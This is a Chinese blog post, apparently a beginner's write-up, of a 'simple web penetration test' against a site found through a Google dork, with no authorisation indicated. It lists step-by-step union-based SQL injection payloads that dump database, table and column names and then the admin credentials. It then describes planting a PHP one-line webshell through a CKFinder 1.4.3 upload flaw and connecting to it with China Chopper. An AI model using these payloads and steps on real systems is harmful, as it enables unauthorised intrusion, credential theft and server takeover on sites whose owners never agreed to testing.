记一次简单的web渗透测试

0x01初期探索

        用google语法 inurl:php?id=查找有漏洞的页面

记一次简单的web渗透测试_第1张图片

0x20开始寻找注入漏洞

        1.通过简单的sql语句探测(',and 1=1,and 1=2)得出该sql注入为字符型注入(sql语句为:' and '1'='2)

      记一次简单的web渗透测试_第2张图片

        2.构造错误的sql语句,使其爆出数据库类型

       

        3.检测字段数(sql语句:'order by 5--+;猜字段数可用二分法),最后查出字段数为5

记一次简单的web渗透测试_第3张图片

        4.构造错误(可构造不存在的id或and 1=2),使页面爆出可利用的字段数(sql语句:'union select 1,2,3,4,5--+)

记一次简单的web渗透测试_第4张图片

        4.利用爆出的字段数,构造sql语句查询自己想要的内容

            a.查数据库版本version()

            记一次简单的web渗透测试_第5张图片

            b.构造语句查数据库名(sql语句:'union select 1,2,database(),4,5--+)

            记一次简单的web渗透测试_第6张图片

        c.因mysql版本大于5.0,含有information表,所以可构造语句查表名(sql语句:'union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=数据库名(16进制,可用小葵转换))

记一次简单的web渗透测试_第7张图片

    

      d.爆列名(login表,sql语句:'union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema=表名(16进制))

记一次简单的web渗透测试_第8张图片

        e.爆数据(uname,paswd;sql语句:'union select 1,2,group_concat(uname,0x5c,paswd),4,5 from login--+)

        记一次简单的web渗透测试_第9张图片

0x03提权

    至此,管理员账号和密码已爆出,在用御剑扫后台时发现了其中一个页面


发现网站编辑器为CKFinder,版本1.4.3,可搜索该版本的上传漏洞,上传php一句话木马图片,菜刀连之拿webshell

记一次简单的web渗透测试_第10张图片

0x04 小记

刚开始写博客,有些不足希望你们指出,也欢迎各位与我交流共同进步。

你可能感兴趣的:(记一次简单的web渗透测试)